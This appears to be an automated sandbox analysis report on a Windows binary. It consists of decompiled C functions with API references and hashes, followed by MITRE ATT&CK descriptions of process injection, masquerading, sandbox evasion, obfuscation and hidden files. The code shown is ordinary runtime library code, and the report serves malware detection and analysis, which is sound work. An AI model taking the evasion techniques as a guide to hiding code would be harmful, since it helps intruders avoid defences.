Opcode ID: 8e7e12c1d50eaefc46e865cbfd3ee717ae355514b69d53891cd43f448e5456b4
Instruction ID: 19a3236b257a23e403f0296e6cb30a89f0e944724a7da86974bbd27a45870086
Opcode Fuzzy Hash: 8e7e12c1d50eaefc46e865cbfd3ee717ae355514b69d53891cd43f448e5456b4
Instruction Fuzzy Hash: B50179B19001186FCB19DF64DD56AEF77B9EF44704F4101BABA06F3180EA789F448AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A311, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041A311(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t29;
				void* _t47;
				void* _t51;
				void* _t53;
				void* _t54;

				_t54 = __eflags;
				_t47 = __edx;
				_push(0xc);
				E0041F6EA(E00433470, __ebx, __edi, __esi);
				_t51 = E0040DB94(__ebx, __edi, __esi, _t54);
				E0040FA7F(__ebx, _t51, _t53, 1);
				_t2 = _t51 + 0x34; // 0x34
				_t49 = _t2;
				 *((intOrPtr*)(_t53 - 0x14)) = 0;
				E0040FF4A(_t2, _t53 - 0x10, 0x436e68, _t53 - 0x14);
				 *((intOrPtr*)(_t53 - 4)) = 0;
				while( *((intOrPtr*)( *(_t53 - 0x10) - 0xc)) != 0) {
					UnregisterClassA( *(_t53 - 0x10),  *(E0040DB94(0, _t49, 0x436e68, __eflags) + 8));
					_t29 = E0040FF4A(_t49, _t53 - 0x18, 0x436e68, _t53 - 0x14);
					 *((char*)(_t53 - 4)) = 1;
					E004071CF(_t53 - 0x10, _t53, _t29);
					__eflags =  *((intOrPtr*)(_t53 - 0x18)) + 0xfffffff0;
					 *((char*)(_t53 - 4)) = 0;
					E00403036( *((intOrPtr*)(_t53 - 0x18)) + 0xfffffff0, _t47);
				}
				E00402C20(_t49);
				E0040FAEC(1);
				return E0041F7C2(E00403036( &(( *(_t53 - 0x10))[0xfffffffffffffff0]), _t47));
			}

APIs

__EH_prolog3.LIBCMT ref: 0041A318

Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
Part of subcall function 0040FA7F: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
Part of subcall function 0040FA7F: LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3

UnregisterClassA.USER32 ref: 0041A358

Strings

hnC, xrefs: 0041A332

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CriticalSection$Enter$ClassH_prolog3InitializeLeaveUnregister
String ID: hnC
API String ID: 2524309216-2905478537
Opcode ID: ffcc6aad4f89ebf377f4c376c63438c322617fcf0fa9e5959b7b804a15e635af
Instruction ID: dc9c157aa842fe30cd6fe9b5929375e780ac80eaa54db6f8b7d68f330885adc6
Opcode Fuzzy Hash: ffcc6aad4f89ebf377f4c376c63438c322617fcf0fa9e5959b7b804a15e635af
Instruction Fuzzy Hash: 7611737190110A9FCB10EBE5C851AEEB779AF44308F00057FB112B72D2CA3C6A49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402F17, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E00402F17(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v16;
				char _v24;
				intOrPtr _v36;
				intOrPtr _t10;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t28;
				void* _t30;

				_t26 = __esi;
				_t25 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t10 = _a4;
				if(_t10 == 0) {
					L7:
					return _t10;
				} else {
					if(_t10 == 0xc) {
						_push(_t27);
						_t28 = _t30;
						_push(__ecx);
						_v8 = 0x442350;
						E0041F7F4( &_v8, 0x43c4ec);
						asm("int3");
						_push(_t28);
						_t27 = _t30;
						_push(_t23);
						_t4 =  &_v16; // 0x442350
						_v16 = 0x4423e8;
						E0041F7F4(_t4, 0x43c54c);
						asm("int3");
						goto L10;
					} else {
						if(_t10 == 0x16 || _t10 == 0x22 || _t10 != 0x50) {
							L10:
							_push(_t27);
							_push(_t23);
							_t6 =  &_v24; // 0x4423e8
							_v24 = 0x442480;
							E0041F7F4(_t6, 0x43c590);
							asm("int3");
							_push(4);
							E0041F6EA(E00431BFC, _t22, _t25, _t26);
							_t24 = E0040F014(0x104);
							_v36 = _t24;
							_t20 = 0;
							_v24 = 0;
							if(_t24 != 0) {
								_t20 = E0040D519(_t24);
							}
							return E0041F7C2(_t20);
						} else {
							goto L7;
						}
					}
				}
			}

APIs

__CxxThrowException@8.LIBCMT ref: 004037F7
__EH_prolog3.LIBCMT ref: 00403804

Strings

#D, xrefs: 004037EC, 004037EF

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID: #D
API String ID: 3670251406-724133492
Opcode ID: 85853aadfd074157ec7116a43067f9815513aa3ef37de8bdfc9c1c2a10bf49d8
Instruction ID: b0f2db476828d076c5aa5a1c3ccda07ec6cbf835b824b1e618174a28debf0169
Opcode Fuzzy Hash: 85853aadfd074157ec7116a43067f9815513aa3ef37de8bdfc9c1c2a10bf49d8
Instruction Fuzzy Hash: 98F059B4210202ABDF24EBA9455956F21A89B48748F60487BF101F22C1E6BCCA80A62E

Uniqueness

Uniqueness Score: -1.00%

Function 004127B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004127B4(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t35;
				void* _t36;

				_t36 = __eflags;
				_push(4);
				E0041F6EA(E00432BE0, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t35 - 0x10)) = __ecx;
				E004048ED(__ecx, _t36);
				 *((intOrPtr*)(_t35 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x43688c;
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t35 + 8));
				E00419FBF(__ecx + 0x24, 0xa);
				 *((char*)(_t35 - 4)) = 1;
				E00412091(__ecx + 0x40, 0xa);
				 *(__ecx + 0x5c) =  *(__ecx + 0x5c) | 0xffffffff;
				 *(__ecx + 0x60) =  *(__ecx + 0x60) | 0xffffffff;
				 *((intOrPtr*)(__ecx + 0x64)) = 0;
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x6c)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0x436954;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0x436934;
				return E0041F7C2(__ecx);
			}

APIs

__EH_prolog3.LIBCMT ref: 004127BB

Strings

4iC, xrefs: 00412811
TiC, xrefs: 0041280A

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: H_prolog3
String ID: 4iC$TiC
API String ID: 431132790-4008140021
Opcode ID: 25bd1f09a88dfbd6e75494a7b2438433112ff2ef9308b05e2517b23215d19696
Instruction ID: 5d0dc50055799547b18938ce6c7b49451773700af5d5b110cd1056841da70260
Opcode Fuzzy Hash: 25bd1f09a88dfbd6e75494a7b2438433112ff2ef9308b05e2517b23215d19696
Instruction Fuzzy Hash: B301FBB1900B419BD720EF2B850564AFFE0BF58714F108A0FE6E6877A1C7B8A645CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00409BB5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00409BB5(void* __ebx, void* __edi, void* __eflags) {
				char _v16;
				intOrPtr _v28;
				void* __esi;
				unsigned int _t11;
				unsigned int _t12;
				intOrPtr _t20;
				intOrPtr _t25;
				void* _t27;
				void* _t28;

				_push(_t27);
				_push(0x4037fd);
				_t28 = E0040F584(__ebx, 0x44642c, __edi, _t27, __eflags);
				if(_t28 != 0) {
					 *((intOrPtr*)(_t28 + 0x68)) = GetMessageTime();
					_t11 = GetMessagePos();
					_t12 = _t11 >> 0x10;
					__eflags = _t12;
					 *((intOrPtr*)(_t28 + 0x70)) = _t12;
					 *((intOrPtr*)(_t28 + 0x6c)) = _t11;
					_t8 = _t28 + 0x58; // 0x58
					return _t8;
				} else {
					_push(0x44642c);
					_t1 =  &_v16; // 0x4423e8
					_v16 = 0x442480;
					E0041F7F4(_t1, 0x43c590);
					asm("int3");
					_push(4);
					E0041F6EA(E00431BFC, __ebx, __edi, _t28);
					_t25 = E0040F014(0x104);
					_v28 = _t25;
					_t20 = 0;
					_v16 = 0;
					if(_t25 != 0) {
						_t20 = E0040D519(_t25);
					}
					return E0041F7C2(_t20);
				}
			}

APIs

Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B

GetMessageTime.USER32(004037FD), ref: 00409BD0
GetMessagePos.USER32 ref: 00409BD9

Strings

,dD, xrefs: 00409BBB

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: Message$H_prolog3Time
String ID: ,dD
API String ID: 3041656633-3191229884
Opcode ID: 85efacd1186bf4a8b795f4880ecfb808e23b542ecfef8d82670301cc578eca90
Instruction ID: 33c9b5c6f293619a4ac6e8f97073239bc9264db69f185d1a93d85d444b44338a
Opcode Fuzzy Hash: 85efacd1186bf4a8b795f4880ecfb808e23b542ecfef8d82670301cc578eca90
Instruction Fuzzy Hash: 42E046B5800B618BD7219F65A4481AB7AE4EB44366300083FE886E7A50DB38E802CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004037E3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E004037E3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v20;
				intOrPtr _t10;
				intOrPtr _t14;

				_push(__ecx);
				_t1 =  &_v8; // 0x4423e8
				_v8 = 0x442480;
				E0041F7F4(_t1, 0x43c590);
				asm("int3");
				_push(4);
				E0041F6EA(E00431BFC, __ebx, __edi, __esi);
				_t14 = E0040F014(0x104);
				_v20 = _t14;
				_t10 = 0;
				_v8 = 0;
				if(_t14 != 0) {
					_t10 = E0040D519(_t14);
				}
				return E0041F7C2(_t10);
			}

0x004037e6
0x004037ec
0x004037f0
0x004037f7
0x004037fc
0x004037fd
0x00403804
0x00403813
0x00403815
0x00403818
0x0040381c
0x0040381f
0x00403821
0x00403821
0x0040382b

APIs

__CxxThrowException@8.LIBCMT ref: 004037F7

Part of subcall function 0041F7F4: RaiseException.KERNEL32(?,?,?,?), ref: 0041F834

__EH_prolog3.LIBCMT ref: 00403804

Part of subcall function 0040F014: LocalAlloc.KERNEL32(00000040,00442480,00403813,00000104,00000004,#D,0043C590,?,?,P#D,0043C54C,?,?,000000FF,0043C4EC), ref: 0040F01A

Strings

#D, xrefs: 004037EC, 004037EF

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: AllocExceptionException@8H_prolog3LocalRaiseThrow
String ID: #D
API String ID: 927841988-724133492
Opcode ID: 8d38915f9f95c0d2ad1004b0652c1badefd5fb6fe002ff9900cc593122a3e41a
Instruction ID: ed78f3ae13bf56099f920655d6bdc6ccae9d51d717f7131c7a3c52a0a811eed1
Opcode Fuzzy Hash: 8d38915f9f95c0d2ad1004b0652c1badefd5fb6fe002ff9900cc593122a3e41a
Instruction Fuzzy Hash: C8D012B5250208BBD600FBD68947ECD715CDB08708F60547BF310A65D2E7F96A89533D

Uniqueness

Uniqueness Score: -1.00%

Function 0041F481, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F481(void* __eax, void* __esi) {
				void* _t13;
				intOrPtr _t16;

				_t1 = _t13 + 5;
				 *_t1 =  *((intOrPtr*)(_t13 + 5)) + __esi;
				_t16 =  *_t1;
			}

0x0041f486
0x0041f486
0x0041f486

APIs

__FF_MSGBANNER.LIBCMT ref: 0041F489

Part of subcall function 0042608D: __NMSG_WRITE.LIBCMT ref: 004260B4
Part of subcall function 0042608D: __NMSG_WRITE.LIBCMT ref: 004260BE

__NMSG_WRITE.LIBCMT ref: 0041F492

Part of subcall function 00425EED: _strcpy_s.LIBCMT ref: 00425F59
Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425F6A
Part of subcall function 00425EED: GetModuleFileNameA.KERNEL32(00000000,00446DC9,00000104,?,00401B31,00009618), ref: 00425F86
Part of subcall function 00425EED: _strcpy_s.LIBCMT ref: 00425F9B
Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425FAE
Part of subcall function 00425EED: _strlen.LIBCMT ref: 00425FB7
Part of subcall function 00425EED: _strlen.LIBCMT ref: 00425FC4
Part of subcall function 00425EED: __invoke_watson.LIBCMT ref: 00425FF1

Part of subcall function 0041F960: ___crtCorExitProcess.LIBCMT ref: 0041F964
Part of subcall function 0041F960: ExitProcess.KERNEL32 ref: 0041F96E

Strings

|hD, xrefs: 0041F481

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$FileModuleName___crt
String ID: |hD
API String ID: 4122421049-2118069248
Opcode ID: eb0fc998651eac4c209a840669decf8684686f75d9fb24df06ed1deb8ad2b860
Instruction ID: e70cd8b630b281eaa6359728f90183fb7d6d66781cb960f2164c911ee12c87e2
Opcode Fuzzy Hash: eb0fc998651eac4c209a840669decf8684686f75d9fb24df06ed1deb8ad2b860
Instruction Fuzzy Hash: 9EC08CB12147103AD600BB12A80391D22608F00B24F22843FF008140D2DB398580600E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F496, Relevance: 5.1, APIs: 4, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040F496(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t31;
				intOrPtr _t32;
				signed int _t38;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr* _t44;
				long* _t47;
				intOrPtr* _t50;

				_push(__ecx);
				_t50 = _a4;
				_t38 = 1;
				_t47 = __ecx;
				_v8 = 1;
				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
					L10:
					_t39 =  &(_t47[7]);
					EnterCriticalSection(_t39);
					E0040F149( &(_t47[5]), _t50);
					LeaveCriticalSection(_t39);
					LocalFree( *(_t50 + 0xc));
					 *((intOrPtr*)( *_t50))(1);
					_t31 = TlsSetValue( *_t47, 0);
					L11:
					return _t31;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t47[4] + 4 + _t38 * 8)) == _t32) {
						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44))(1);
						}
						_t31 =  *(_t50 + 0xc);
						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
					} else {
						_t31 =  *(_t50 + 0xc);
						if( *(_t31 + _t38 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t38 = _t38 + 1;
				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
				if(_v8 == 0) {
					goto L11;
				}
				goto L10;
			}

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040F4F3
LeaveCriticalSection.KERNEL32(?,?), ref: 0040F503
LocalFree.KERNEL32(?), ref: 0040F50C
TlsSetValue.KERNEL32(?,00000000), ref: 0040F51E

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: 9485fa99e575f6fba2d3db258f94ccea0763652fbd318a00cc68c60fcce8b19c
Instruction ID: 2b8ded7cbabb034d170cb8e1f6a20b40d79b2ab9c9a6a536b212b17957fcc661
Opcode Fuzzy Hash: 9485fa99e575f6fba2d3db258f94ccea0763652fbd318a00cc68c60fcce8b19c
Instruction Fuzzy Hash: E8117935600604EFD720CF54D888BAAB7B4FF55315F10843AE9469BAA2CB74B984CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA7F, Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E0040FA7F(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E004037E3(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x44660c == 0) {
					_t4 = E0040FA16();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x4467c0 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x4467a8);
					if( *_t15 == 0) {
						_t4 = 0x446610 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x4467a8);
				}
				EnterCriticalSection(0x446610 + _t11 * 0x18);
				return _t4;
			}

APIs

EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: 8525257333676ca08d676e7b2a81b6225231d4ca005925c9b4ed6641576d303d
Instruction ID: 11894b6c2aef66c6a57d0d31d06213815613db8dfd1157861ab68b14672cec20
Opcode Fuzzy Hash: 8525257333676ca08d676e7b2a81b6225231d4ca005925c9b4ed6641576d303d
Instruction Fuzzy Hash: CDF0F6B72001049BDB205F98EC44759B799EBE3319F13103BE04092591DB7D55848E6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F03C, Relevance: 5.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040F03C(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x4465f0
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

APIs

EnterCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F045
TlsGetValue.KERNEL32(004465D4,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F05A
LeaveCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F070
LeaveCriticalSection.KERNEL32(004465F0,?,?,?,0040F5EB,?,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004,00401181), ref: 0040F07B

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 9a40517444bb365cbe8405af2ef5f1505744aac530f5d2e3c0f55a5ba20e43c5
Instruction ID: 60d108fa28f27cf260cddbd5588e553d64dca512099a42e32762409037fd1fc8
Opcode Fuzzy Hash: 9a40517444bb365cbe8405af2ef5f1505744aac530f5d2e3c0f55a5ba20e43c5
Instruction Fuzzy Hash: 7FF0F47A200A009FC6308F64DC48D5A77A9EAD4351316957BE442A3562DA78F989CA54

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

